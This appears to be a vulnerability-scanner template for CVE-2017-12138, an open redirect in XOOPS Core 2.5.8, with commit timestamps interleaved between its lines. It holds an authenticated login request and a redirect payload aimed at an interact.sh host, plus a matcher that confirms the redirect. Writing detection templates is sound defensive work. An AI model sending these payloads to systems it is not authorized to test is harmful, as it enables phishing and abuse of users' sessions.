2022-04-30 08:04:24 +00:00
id : CVE-2017-12138
info :
name : XOOPS Core 2.5.8 - Open Redirect
author : 0x_Akoko
2022-05-24 09:52:52 +00:00
severity : medium
2022-10-19 21:11:27 +00:00
description : XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-04-30 08:04:24 +00:00
reference :
- https://github.com/XOOPS/XoopsCore25/issues/523
2022-04-30 19:42:44 +00:00
- https://xoops.org
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-12138
2022-04-30 08:04:24 +00:00
classification :
2022-05-24 09:52:52 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-04-30 08:04:24 +00:00
cve-id : CVE-2017-12138
cwe-id : CWE-601
2023-07-15 16:29:17 +00:00
epss-score : 0.00062
cpe : cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-15 16:29:17 +00:00
vendor : xoops
product : xoops
tags : cve,cve2017,redirect,xoops,authenticated
2022-04-30 08:04:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-24 09:38:29 +00:00
- raw :
- |
POST /user.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-04-30 08:04:24 +00:00
2022-05-24 09:38:29 +00:00
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
- |
2022-06-06 10:40:15 +00:00
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
2022-05-24 09:38:29 +00:00
Host : {{Hostname}}
cookie-reuse : true
2022-04-30 08:04:24 +00:00
matchers :
- type : regex
part : header
2022-04-30 19:42:44 +00:00
regex :
2023-03-01 08:39:14 +00:00
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1